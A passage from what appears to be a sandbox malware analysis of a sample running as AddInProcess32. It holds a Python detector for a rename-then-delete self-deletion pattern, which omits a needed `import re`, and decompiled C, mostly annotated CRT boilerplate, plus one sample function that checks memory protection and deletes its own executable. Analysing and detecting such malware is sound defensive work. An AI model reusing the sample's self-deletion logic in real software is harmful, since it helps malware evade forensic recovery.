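from dataclasses import dataclass
from typing import List, Optional, Union

# Constructed input: the seven API lines from the listing above, copied as they appear
# in the report. In a real pipeline these would come from a sandbox or EDR API trace.
TRACE = """
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 02B52D93
• CreateFileW.KERNEL32(?,00010000,00000000,00000000,00000003,00000080,00000000,?,00000000), ref: 02B52DAF
• SetFileInformationByHandle.KERNEL32(00000000,00000003,?,?), ref: 02B52DF1
• CloseHandle.KERNEL32(00000000), ref: 02B52E04
• CreateFileW.KERNEL32(?,00010000,00000000,00000000,00000003,00000080,00000000), ref: 02B52E1E
• SetFileInformationByHandle.KERNEL32(00000000,00000004,?,00000001), ref: 02B52E3E
• CloseHandle.KERNEL32(00000000), ref: 02B52E47
""".strip().splitlines()

# Win32 constants (winnt.h / minwinbase.h) used to decode the raw argument values.
DELETE = 0x00010000                 # standard access right needed for rename and disposition
OPEN_EXISTING = 3                   # dwCreationDisposition
FileRenameInfo = 3                  # FILE_INFO_BY_HANDLE_CLASS
FileDispositionInfo = 4             # FILE_INFO_BY_HANDLE_CLASS; the struct is one BOOLEAN (1 byte)
ACCESS_NAMES = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE", DELETE: "DELETE"}
INFO_CLASS_NAMES = {FileRenameInfo: "FileRenameInfo", FileDispositionInfo: "FileDispositionInfo"}

Arg = Union[int, str, None]         # hex value, literal string, or "?" (not recovered by the sandbox)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Arg]
    ref: int                        # address of the call site


_LINE = re.compile(r"^\s*•?\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")
_HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")


def parse_api_line(line: str) -> ApiCall:
    """Parse one 'Name.MODULE(arg,arg,...), ref: ADDR' line from the report's API listing."""
    m = _LINE.match(line)
    if not m:
        raise ValueError(f"not an API trace line: {line!r}")
    name, module, raw_args, ref = m.groups()
    args: List[Arg] = []
    for tok in (raw_args.split(",") if raw_args else []):
        tok = tok.strip()
        if tok == "?":
            args.append(None)
        elif _HEX8.match(tok):
            args.append(int(tok, 16))
        else:
            args.append(tok)        # string argument such as KERNEL32.DLL
    return ApiCall(name, module, args, int(ref, 16))


def explain(call: ApiCall) -> str:
    """Render the security-relevant arguments of a call with their symbolic names."""
    if call.name == "CreateFileW" and len(call.args) >= 5 and call.args[1] is not None:
        names = [n for bit, n in ACCESS_NAMES.items() if call.args[1] & bit] or [hex(call.args[1])]
        disp = "OPEN_EXISTING" if call.args[4] == OPEN_EXISTING else str(call.args[4])
        return f"CreateFileW access={'|'.join(names)} disposition={disp}"
    if call.name == "SetFileInformationByHandle" and len(call.args) >= 2:
        cls = INFO_CLASS_NAMES.get(call.args[1], str(call.args[1]))
        return f"SetFileInformationByHandle class={cls}"
    return call.name


def _is_delete_open(c: ApiCall) -> bool:
    return (c.name == "CreateFileW" and len(c.args) >= 5 and c.args[1] is not None
            and bool(c.args[1] & DELETE) and c.args[4] == OPEN_EXISTING)


def _is_set_info(info_class: int):
    return lambda c: (c.name == "SetFileInformationByHandle"
                      and len(c.args) >= 2 and c.args[1] == info_class)


# The self-deletion pattern as an ordered sub-sequence of the trace. The rename must come
# before the disposition call: that ordering is what separates it from a plain file delete.
SELF_DELETE_PATTERN = [
    lambda c: c.name == "GetModuleFileNameW" and c.args[:1] == [0],   # hModule NULL: own image path
    _is_delete_open,
    _is_set_info(FileRenameInfo),
    _is_delete_open,
    _is_set_info(FileDispositionInfo),
]


def _find_ordered(calls: List[ApiCall], predicates) -> Optional[List[ApiCall]]:
    """Greedy in-order match: each predicate must match some call after the previous match."""
    matched, pos = [], 0
    for pred in predicates:
        while pos < len(calls) and not pred(calls[pos]):
            pos += 1
        if pos == len(calls):
            return None
        matched.append(calls[pos])
        pos += 1
    return matched


def detect_self_delete(lines: List[str]) -> dict:
    """Return whether the trace contains the rename-then-delete self-deletion sequence."""
    calls = [parse_api_line(l) for l in lines if l.strip()]
    hit = _find_ordered(calls, SELF_DELETE_PATTERN)
    if hit is None:
        return {"matched": False, "refs": [], "steps": []}
    disposition = hit[-1]
    return {
        "matched": True,
        "refs": [c.ref for c in hit],
        "steps": [explain(c) for c in hit],
        # dwBufferSize 1 == sizeof(FILE_DISPOSITION_INFO); the DeleteFile value itself is not in the trace
        "disposition_buffer_size": disposition.args[3] if len(disposition.args) > 3 else None,
    }


if __name__ == "__main__":
    result = detect_self_delete(TRACE)
    for step in result["steps"]:
        print(step)
    print("self-delete pattern:", result["matched"])
```

The detector deliberately requires the FileRenameInfo call to precede the FileDispositionInfo call and both opens to carry DELETE access with OPEN_EXISTING; dropping the rename line from the input makes the match fail, which is the behaviour to keep when porting the check to an EDR rule so that ordinary temp-file deletion does not fire it.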

                                              C-Code - Quality: 77%
                                              			/* Matches the MSVC CRT __crtDecodePointer helper (CRT boilerplate present in any
                                              			 * statically linked MSVC binary; not sample-specific behaviour). *0x4138c4 is the
                                              			 * CRT's __getvalueindex TLS index whose slot stores the FlsGetValue function pointer,
                                              			 * and *0x4138c0 is __flsindex; when the per-thread data caches a DecodePointer pointer
                                              			 * (offset 0x1fc) it is used, otherwise the export is resolved from KERNEL32 by name.
                                              			 * In the CRT source the indirect call's result is what is returned; the decompiler's
                                              			 * "return _a4" after that call is a decompilation artifact, not the sample's logic.
                                              			 * Trailing "@addr" comments give the instruction address of each statement as
                                              			 * rendered by the Joe Sandbox IDA plugin. */
                                              			E00406443(intOrPtr _a4) {
                                              				intOrPtr _v0;
                                              				struct HINSTANCE__* _t8;
                                              				_Unknown_base(*)()* _t9;
                                              				intOrPtr _t11;
                                              				void* _t13;
                                              				struct HINSTANCE__* _t15;
                                              
                                              				if(TlsGetValue( *0x4138c4) == 0) {	// @0x00406454
                                              					L4:	// @0x00406477
                                              					_t15 = GetModuleHandleA("KERNEL32.DLL");	// @0x00406482
                                              					__eflags = _t15;	// @0x00406484
                                              					if(__eflags == 0) {	// @0x00406486
                                              						L9:	// @0x004064ab
                                              						return _a4;	// @0x004064b0
                                              					}	// @0x004064b0
                                              					_t8 = E00406360(__eflags);	// @0x00406488
                                              					__eflags = _t8;	// @0x0040648d
                                              					if(_t8 == 0) {	// @0x0040648f
                                              						goto L9;
                                              					}
                                              					_t9 = GetProcAddress(_t15, "DecodePointer");	// @0x00406497
                                              					L7:	// @0x0040649d
                                              					if(_t9 != 0) {	// @0x0040649f
                                              						_v0 =  *_t9(_a4);	// @0x004064a7
                                              					}	// @0x004064a7
                                              					goto L9;
                                              				}	// @0x0040649f
                                              				_t11 =  *0x4138c0; // 0xffffffff  @0x00406456
                                              				if(_t11 == 0xffffffff) {	// @0x0040645e
                                              					goto L4;
                                              				}
                                              				_push(_t11);	// @0x00406460
                                              				_t13 =  *(TlsGetValue( *0x4138c4))();	// @0x00406469
                                              				if(_t13 == 0) {	// @0x0040646d
                                              					goto L4;
                                              				}
                                              				_t9 =  *(_t13 + 0x1fc);	// @0x0040646f
                                              				goto L7;
                                              			}

                                              APIs
                                              • TlsGetValue.KERNEL32(?,00406ED3,004035FD,?,?,00401E38,00000000,?,?), ref: 00406450
                                              • TlsGetValue.KERNEL32(FFFFFFFF,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00406467
                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040647C
                                              • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00406497
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Value$AddressHandleModuleProc
                                              • String ID: DecodePointer$KERNEL32.DLL
                                              • API String ID: 1929421221-629428536
                                              • Opcode ID: b690ae7a4bf386a7f8bd60c127f260c88c3a5c47ce0539964af77006a0b3269b
                                              • Instruction ID: c5ae10eeeadb9dadabf971efa998db1139b8a5cf31b1e54eaa7b2be9f0bd982d
                                              • Opcode Fuzzy Hash: b690ae7a4bf386a7f8bd60c127f260c88c3a5c47ce0539964af77006a0b3269b
                                              • Instruction Fuzzy Hash: 25F03670900612ABC611EB78ED04DAB3BE4AF017A07168572FC45F72F0DB38DD658AAD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 77%
                                              			/* Matches the MSVC CRT __crtEncodePointer helper, the twin of E00406443 above (CRT
                                              			 * boilerplate, not sample-specific behaviour): same FlsGetValue/__flsindex lookup,
                                              			 * but the cached per-thread pointer is EncodePointer at offset 0x1f8 and the KERNEL32
                                              			 * export resolved by name is "EncodePointer". As above, the CRT returns the indirect
                                              			 * call's result; the decompiler's "return _a4" after that call is an artifact.
                                              			 * Trailing "@addr" comments give the instruction address of each statement as
                                              			 * rendered by the Joe Sandbox IDA plugin. */
                                              			E004063CC(intOrPtr _a4) {
                                              				intOrPtr _v0;
                                              				struct HINSTANCE__* _t8;
                                              				_Unknown_base(*)()* _t9;
                                              				intOrPtr _t11;
                                              				void* _t13;
                                              				struct HINSTANCE__* _t15;
                                              
                                              				if(TlsGetValue( *0x4138c4) == 0) {	// @0x004063dd
                                              					L4:	// @0x00406400
                                              					_t15 = GetModuleHandleA("KERNEL32.DLL");	// @0x0040640b
                                              					__eflags = _t15;	// @0x0040640d
                                              					if(__eflags == 0) {	// @0x0040640f
                                              						L9:	// @0x00406434
                                              						return _a4;	// @0x00406439
                                              					}	// @0x00406439
                                              					_t8 = E00406360(__eflags);	// @0x00406411
                                              					__eflags = _t8;	// @0x00406416
                                              					if(_t8 == 0) {	// @0x00406418
                                              						goto L9;
                                              					}
                                              					_t9 = GetProcAddress(_t15, "EncodePointer");	// @0x00406420
                                              					L7:	// @0x00406426
                                              					if(_t9 != 0) {	// @0x00406428
                                              						_v0 =  *_t9(_a4);	// @0x00406430
                                              					}	// @0x00406430
                                              					goto L9;
                                              				}	// @0x00406428
                                              				_t11 =  *0x4138c0; // 0xffffffff  @0x004063df
                                              				if(_t11 == 0xffffffff) {	// @0x004063e7
                                              					goto L4;
                                              				}
                                              				_push(_t11);	// @0x004063e9
                                              				_t13 =  *(TlsGetValue( *0x4138c4))();	// @0x004063f2
                                              				if(_t13 == 0) {	// @0x004063f6
                                              					goto L4;
                                              				}
                                              				_t9 =  *(_t13 + 0x1f8);	// @0x004063f8
                                              				goto L7;
                                              			}

                                              APIs
                                              • TlsGetValue.KERNEL32(00000000,00406441,00000000,0040AF2E,00000000,00000000,00000314,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063D9
                                              • TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063F0
                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 00406405
                                              • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00406420
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Value$AddressHandleModuleProc
                                              • String ID: EncodePointer$KERNEL32.DLL
                                              • API String ID: 1929421221-3682587211
                                              • Opcode ID: 88cf95aeb8d75637f3377e4c34be696f5c1dcc6d34e432568b273bc1bd6ebf91
                                              • Instruction ID: cf491b8ffedcf847512659abc69032a8f38a6fac2648f49244538ea113319bae
                                              • Opcode Fuzzy Hash: 88cf95aeb8d75637f3377e4c34be696f5c1dcc6d34e432568b273bc1bd6ebf91
                                              • Instruction Fuzzy Hash: D9F0BB30901122ABD7116B6CDD00ADB3BD49F007547168072FC05F32F1DB38CC568AAD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			/* Matches the MSVC CRT _mbtowc_l (CRT boilerplate, not sample-specific behaviour):
                                              			 * _a4 = pwc, _a8 = s, _a12 = n, _a16 = locale. E004032D9 is the _LocaleUpdate
                                              			 * constructor (the "& 0xfffffffd" on +0x70 is its destructor clearing the per-thread
                                              			 * flag), +0x14 is lc_handle[LC_CTYPE], +4 the code page and +0xac mb_cur_max;
                                              			 * E00409195 is _isleadbyte_l, MultiByteToWideChar flag 9 is
                                              			 * MB_PRECOMPOSED|MB_ERR_INVALID_CHARS, and the 0x2a stored through E00403CE9's
                                              			 * result is errno = EILSEQ before returning -1. Trailing "@addr" comments give the
                                              			 * instruction address of each statement as rendered by the Joe Sandbox IDA plugin. */
                                              			E0040906B(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				intOrPtr _v8;
                                              				signed int _v12;
                                              				signed int _v20;
                                              				signed int _t50;
                                              				intOrPtr _t55;
                                              				int _t56;
                                              				signed short* _t57;
                                              				short* _t58;
                                              				int _t63;
                                              				char* _t69;
                                              
                                              				_t69 = _a8;	// @0x00409073
                                              				if(_t69 == 0 || _a12 == 0) {	// @0x0040907a
                                              					L5:	// @0x0040908f
                                              					return 0;
                                              				} else {	// @0x00409081
                                              					if( *_t69 != 0) {	// @0x00409083
                                              						E004032D9( &_v20, _a16);	// @0x0040909b
                                              						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {	// @0x004090a6
                                              							if(E00409195( *_t69 & 0x000000ff,  &_v20) == 0) {	// @0x004090d8
                                              								_t40 = _v20 + 4; // 0x840ffff8  @0x0040916b
                                              								_t50 = MultiByteToWideChar( *_t40, 9, _t69, 1, _a4, 0 | _a4 != 0x00000000);	// @0x0040916e
                                              								if(_t50 != 0) {	// @0x00409176
                                              									L10:	// @0x004090b6
                                              									if(_v8 != 0) {	// @0x004090b9
                                              										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;	// @0x004090be
                                              									}	// @0x004090be
                                              									return 1;
                                              								}	// @0x004090c4
                                              								L21:	// @0x00409138
                                              								E00403CE9();	// @0x00409138
                                              								 *_t50 = 0x2a;	// @0x0040913d
                                              								if(_v8 != 0) {	// @0x00409146
                                              									_t50 = _v12;	// @0x00409148
                                              									 *(_t50 + 0x70) =  *(_t50 + 0x70) & 0xfffffffd;	// @0x0040914b
                                              								}	// @0x0040914b
                                              								return _t50 | 0xffffffff;
                                              							}	// @0x0040914f
                                              							_t50 = _v20;	// @0x004090da
                                              							_t15 = _t50 + 0xac; // 0xa045ff98  @0x004090dd
                                              							_t63 =  *_t15;	// @0x004090dd
                                              							if(_t63 <= 1 || _a12 < _t63) {	// @0x004090e6
                                              								L17:	// @0x0040910d
                                              								_t24 = _t50 + 0xac; // 0xa045ff98  @0x00409110
                                              								if(_a12 <  *_t24 || _t69[1] == 0) {	// @0x00409116
                                              									goto L21;
                                              								} else {
                                              									goto L19;
                                              								}
                                              							} else {	// @0x004090ed
                                              								_t21 = _t50 + 4; // 0x840ffff8  @0x004090fd
                                              								_t56 = MultiByteToWideChar( *_t21, 9, _t69, _t63, _a4, 0 | _a4 != 0x00000000);	// @0x00409100
                                              								_t50 = _v20;	// @0x00409108
                                              								if(_t56 != 0) {	// @0x0040910b
                                              									L19:	// @0x0040911d
                                              									_t27 = _t50 + 0xac; // 0xa045ff98  @0x00409120
                                              									_t55 =  *_t27;	// @0x00409120
                                              									if(_v8 == 0) {	// @0x00409126
                                              										return _t55;	// @0x00409094
                                              									}	// @0x00409094
                                              									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;	// @0x0040912f
                                              									return _t55;
                                              								}	// @0x0040912f
                                              								goto L17;
                                              							}	// @0x0040910b
                                              						}	// @0x004090e6
                                              						_t57 = _a4;	// @0x004090a8
                                              						if(_t57 != 0) {	// @0x004090ad
                                              							 *_t57 =  *_t69 & 0x000000ff;	// @0x004090b3
                                              						}	// @0x004090b3
                                              						goto L10;
                                              					} else {	// @0x00409085
                                              						_t58 = _a4;	// @0x00409085
                                              						if(_t58 != 0) {	// @0x0040908a
                                              							 *_t58 = 0;	// @0x0040908c
                                              						}	// @0x0040908c
                                              						goto L5;
                                              					}	// @0x0040908a
                                              				}	// @0x00409083
                                              			}

                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040909B
                                              • __isleadbyte_l.LIBCMT ref: 004090CF
                                              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,00408678,?,?,00000002), ref: 00409100
                                              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,00408678,?,?,00000002), ref: 0040916E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID: pYqt
                                              • API String ID: 3058430110-1213896493
                                              • Opcode ID: 3fc5b2d2f1e3e2c4c861b4164b33fcbf6a78946a5b9e7531fab444a04c299768
                                              • Instruction ID: 60a8676b7946a16de792e5a19dc617b5d93a58ec6caea168880f03a11062425c
                                              • Opcode Fuzzy Hash: 3fc5b2d2f1e3e2c4c861b4164b33fcbf6a78946a5b9e7531fab444a04c299768
                                              • Instruction Fuzzy Hash: F231C031B00246EFEB20DFA4C8849AA7BA5AF00311F1485BAE5A4AF2D2D7359D40DB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 85%
                                              			/* Matches the MSVC CRT _putwc_nolock (CRT boilerplate, not sample-specific
                                              			 * behaviour): _a4 is the wide character and _a8 the FILE*, whose _flag (_t122[3])
                                              			 * is tested for _IOSTRG (0x40) and whose _cnt/_ptr (_t122[1], *_t122) are updated
                                              			 * on the direct-write path. E00408D9C is _fileno; 0x413a18 is __badioinfo and
                                              			 * 0x415ae0 the __pioinfo table with 0x38-byte entries, so the "+0x24 & 0x7f" checks
                                              			 * read the handle's text mode (1 = UTF-8, 2 = UTF-16LE) and "+4 & 0x80" the FTEXT
                                              			 * flag. On the narrow text-mode path E0040C10A converts the character with wctomb_s
                                              			 * into a stack buffer and the bytes are written one at a time, with E00404C86 and
                                              			 * E0040BE3B acting as _flsbuf/_flswbuf. *0x413004 XOR ebp is the /GS security cookie
                                              			 * checked by E0040318A on return. The listing is cut off before the UTF-8 branch. */
                                              			E00408DC9(void* __edx, signed int _a4, signed char** _a8) {
                                              				signed int _v8;
                                              				char _v16;
                                              				char _v20;
                                              				void* __ebx;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t39;
                                              				signed short _t42;
                                              				void* _t44;
                                              				void* _t48;
                                              				void* _t52;
                                              				signed short _t55;
                                              				signed int _t59;
                                              				signed int _t69;
                                              				signed int _t75;
                                              				void* _t81;
                                              				void* _t82;
                                              				signed short _t84;
                                              				signed char* _t98;
                                              				signed char* _t107;
                                              				signed char* _t109;
                                              				void* _t117;
                                              				signed char** _t122;
                                              				void* _t123;
                                              				signed int _t124;
                                              
                                              				_t117 = __edx;
                                              				_t39 =  *0x413004; // 0x98fc836b
                                              				_v8 = _t39 ^ _t124;
                                              				_t122 = _a8;
                                              				if((_t122[3] & 0x00000040) != 0) {
                                              					L34:
                                              					_t34 =  &(_t122[1]);
                                              					 *_t34 =  &(_t122[1][0xfffffffffffffffe]);
                                              					if( *_t34 < 0) {
                                              						_t42 = E0040BE3B(_t117, _a4 & 0x0000ffff, _t122);
                                              					} else {
                                              						_t42 = _a4;
                                              						 *( *_t122) = _t42;
                                              						 *_t122 =  &(( *_t122)[2]);
                                              					}
                                              					L37:
                                              					_pop(_t123);
                                              					_pop(_t81);
                                              					E0040318A(_t42, _t81, _v8 ^ _t124, _t123);
                                              					return _t42;
                                              				}
                                              				if(E00408D9C(_t122) == 0xffffffff || E00408D9C(_t122) == 0xfffffffe) {
                                              					_t44 = 0x413a18;
                                              				} else {
                                              					_t75 = E00408D9C(_t122);
                                              					_t44 = (E00408D9C(_t122) & 0x0000001f) * 0x38 +  *((intOrPtr*)(0x415ae0 + (_t75 >> 5) * 4));
                                              				}
                                              				_t8 = _t44 + 0x24; // 0x0
                                              				if(( *_t8 & 0x0000007f) == 2) {
                                              					goto L34;
                                              				} else {
                                              					if(E00408D9C(_t122) == 0xffffffff || E00408D9C(_t122) == 0xfffffffe) {
                                              						_t48 = 0x413a18;
                                              					} else {
                                              						_t69 = E00408D9C(_t122);
                                              						_t48 = (E00408D9C(_t122) & 0x0000001f) * 0x38 +  *((intOrPtr*)(0x415ae0 + (_t69 >> 5) * 4));
                                              					}
                                              					_t11 = _t48 + 0x24; // 0x0
                                              					if(( *_t11 & 0x0000007f) != 1) {
                                              						if(E00408D9C(_t122) == 0xffffffff || E00408D9C(_t122) == 0xfffffffe) {
                                              							_t52 = 0x413a18;
                                              						} else {
                                              							_t59 = E00408D9C(_t122);
                                              							_t52 = (E00408D9C(_t122) & 0x0000001f) * 0x38 +  *((intOrPtr*)(0x415ae0 + (_t59 >> 5) * 4));
                                              						}
                                              						if(( *(_t52 + 4) & 0x00000080) == 0) {
                                              							goto L34;
                                              						} else {
                                              							_t55 = E0040C10A( &_v20,  &_v16, 5, _a4);
                                              							if(_t55 != 0) {
                                              								goto L15;
                                              							}
                                              							_t82 = 0;
                                              							if(_v20 <= 0) {
                                              								L33:
                                              								_t42 = _a4;
                                              								goto L37;
                                              							} else {
                                              								goto L28;
                                              							}
                                              							while(1) {
                                              								L28:
                                              								_t26 =  &(_t122[1]);
                                              								 *_t26 = _t122[1] - 1;
                                              								if( *_t26 < 0) {
                                              									_t55 = E00404C86( *((char*)(_t124 + _t82 - 0xc)), _t122);
                                              								} else {
                                              									 *( *_t122) =  *((intOrPtr*)(_t124 + _t82 - 0xc));
                                              									_t98 =  *_t122;
                                              									_t55 =  *_t98 & 0x000000ff;
                                              									 *_t122 =  &(_t98[1]);
                                              								}
                                              								if(_t55 == 0xffffffff) {
                                              									goto L15;
                                              								}
                                              								_t82 = _t82 + 1;
                                              								if(_t82 < _v20) {
                                              									continue;
                                              								}
                                              								goto L33;
                                              							}
                                              							goto L15;
                                              						}
                                              					} else {
                                              						_t12 =  &(_t122[1]);
                                              						 *_t12 = _t122[1] - 1;
                                              						_t84 = _a4;
                                              						if( *_t12 < 0) {
                                              							_t55 = E00404C86(_t84, _t122);
                                              						} else {
                                              							 *( *_t122) = _t84;
                                              							_t109 =  *_t122;
                                              							_t55 =  *_t109 & 0x000000ff;
                                              							 *_t122 =  &(_t109[1]);
                                              						}
                                              						if(_t55 != 0xffffffff) {
                                              							_t15 =  &(_t122[1]);
                                              							 *_t15 = _t122[1] - 1;
                                              							if( *_t15 < 0) {
                                              								_t55 = E00404C86(_t84, _t122);
                                              							} else {
                                              								 *( *_t122) = _t84;
                                              								_t107 =  *_t122;
                                              								_t55 =  *_t107 & 0x000000ff;
                                              								 *_t122 =  &(_t107[1]);
                                              							}
                                              							if(_t55 == 0xffffffff) {
                                              								goto L15;
                                              							} else {
                                              								_t42 = _t84;
                                              								goto L37;
                                              							}
                                              						} else {
                                              							L15:
                                              							_t42 = _t55 | 0x0000ffff;
                                              							goto L37;
                                              						}
                                              					}
                                              				}
                                              			}

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: __flsbuf$__flswbuf_wctomb_s
                                              • String ID:
                                              • API String ID: 3257920507-0
                                              • Opcode ID: ca31858a28c25628787a6cd13da6845824825ffbc45749ff7d1aa03c197881a4
                                              • Instruction ID: e3320308620aae82afad94c34382f6534f6cf98c8d3c2b43a25689cd414ae7a4
                                              • Opcode Fuzzy Hash: ca31858a28c25628787a6cd13da6845824825ffbc45749ff7d1aa03c197881a4
                                              • Instruction Fuzzy Hash: 9B5127721196119ECB249B38DA818AB37A8DF16335330073FF5E1EB2D1DE3C9502869D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 88%
                                              			E02B5138F(void* __ebx, void* __edi, void* __esi) {
                                              				signed int _v8;
                                              				char _v532;
                                              				short _v1052;
                                              				struct _MEMORY_BASIC_INFORMATION _v1080;
                                              				char _v1084;
                                              				char _v1088;
                                              				signed int _t14;
                                              				void* _t16;
                                              				long _t18;
                                              				long _t21;
                                              				long _t22;
                                              				long _t23;
                                              				signed int _t44;
                                              				signed int _t46;
                                              
                                              				_t40 = __edi;
                                              				_t28 = __ebx;
                                              				_t46 = (_t44 & 0xfffffff8) - 0x43c;
                                              				_t14 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t14 ^ _t46;
                                              				_push(__esi);
                                              				_v1088 = 0;
                                              				_t16 = GetModuleHandleA(0);
                                              				if(_t16 == 0 || VirtualQuery(_t16,  &_v1080, 0x1000) == 0) {
                                              					L4:
                                              					_t18 = GetModuleFileNameW(0,  &_v1052, 0x103);
                                              					__eflags = _t18;
                                              					if(_t18 != 0) {
                                              						_t21 = E02B529B2( &_v1052,  &_v1088,  &_v1084);
                                              						__eflags = _t21;
                                              						if(_t21 != 0) {
                                              							_t22 = E02B52D50(_t28, _t40, 0);
                                              							__eflags = _t22;
                                              							if(_t22 != 0) {
                                              								_t23 = E02B52AC6(_t28,  &_v532, 0x2b57468, _t40, 0, 0x1c00);
                                              								_pop(_t34);
                                              								__eflags = _t23;
                                              								if(__eflags != 0) {
                                              									E02B522F0(_t28,  &_v532, _v1088, _t40, 0, __eflags, _v1084, 0);
                                              									_t46 = _t46 + 0xc;
                                              								}
                                              							}
                                              						}
                                              					}
                                              					goto L9;
                                              				} else {
                                              					_t49 = _v1080.Protect - 0x40;
                                              					if(_v1080.Protect != 0x40) {
                                              						goto L4;
                                              					} else {
                                              						E02B52D50(__ebx, __edi, 0);
                                              						E02B51000(__ebx, __edi, 0, _t49);
                                              						L9:
                                              						return E02B53C33(_v8 ^ _t46);
                                              					}
                                              				}
                                              			}

                                              APIs
                                              • GetModuleHandleA.KERNEL32(00000000), ref: 02B513B1
                                              • VirtualQuery.KERNEL32(00000000,?,00001000), ref: 02B513C6
                                                • Part of subcall function 02B52D50: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 02B52D93
                                                • Part of subcall function 02B52D50: CreateFileW.KERNEL32(?,00010000,00000000,00000000,00000003,00000080,00000000,?,00000000), ref: 02B52DAF
                                                • Part of subcall function 02B52D50: SetFileInformationByHandle.KERNEL32(00000000,00000003,?,?), ref: 02B52DF1
                                                • Part of subcall function 02B52D50: CloseHandle.KERNEL32(00000000), ref: 02B52E04
                                                • Part of subcall function 02B52D50: CreateFileW.KERNEL32(?,00010000,00000000,00000000,00000003,00000080,00000000), ref: 02B52E1E
                                                • Part of subcall function 02B52D50: SetFileInformationByHandle.KERNEL32(00000000,00000004,?,00000001), ref: 02B52E3E
                                                • Part of subcall function 02B52D50: CloseHandle.KERNEL32(00000000), ref: 02B52E47
                                                • Part of subcall function 02B51000: GetProcessHeap.KERNEL32(00000008,00200000,?,00000000), ref: 02B51026
                                                • Part of subcall function 02B51000: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02B5102D
                                                • Part of subcall function 02B51000: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,00000000), ref: 02B510E5
                                                • Part of subcall function 02B51000: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02B510EC
                                                • Part of subcall function 02B51000: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02B5112C
                                                • Part of subcall function 02B51000: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02B51133
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 02B513EE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
• Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: FileHeap$Handle$ModuleProcess$AllocCloseCreateInformationName$FreeQueryVirtual
                                              • String ID: @
                                              • API String ID: 1754921816-2766056989
                                              • Opcode ID: e3d1c281258557e224337659cea260c4033d2a54745456dba05319395f732670
                                              • Instruction ID: d6538d423489bd5b9aedca3d80821de64701dbbe9993fe36e1ef5757e1795148
                                              • Opcode Fuzzy Hash: e3d1c281258557e224337659cea260c4033d2a54745456dba05319395f732670
